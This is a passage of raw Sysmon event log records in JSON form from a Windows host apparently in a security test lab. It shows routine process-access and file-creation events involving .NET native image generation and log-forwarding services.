07:02:22.591","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010CB9C0F00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:22.951\r\nProcessGuid: {E2A3D6B1-137E-5F25-0000-0010CB9C0F00}\r\nProcessId: 2544\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9f0-0\\System.ServiceModel.Channels.dll\r\nCreationUtcTime: 2020-08-01 07:02:22.951","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:22.951","ProcessGuid":"{E2A3D6B1-137E-5F25-0000-0010CB9C0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9f0-0\\System.ServiceModel.Channels.dll","CreationUtcTime":"2020-08-01 07:02:22.951","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.982\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-001092A30F00}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.982","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-001092A30F00}","TargetProcessId":"4912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.982\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-001092A30F00}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.982","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-001092A30F00}","TargetProcessId":"4912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-001092A30F00}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-001092A30F00}","TargetProcessId":"4912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.107\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.107","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.123\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-001078A70F00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.123","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-001078A70F00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8569,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.123\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-001078A70F00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.123","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-001078A70F00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8570,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.123\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-001078A70F00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.123","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-001078A70F00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
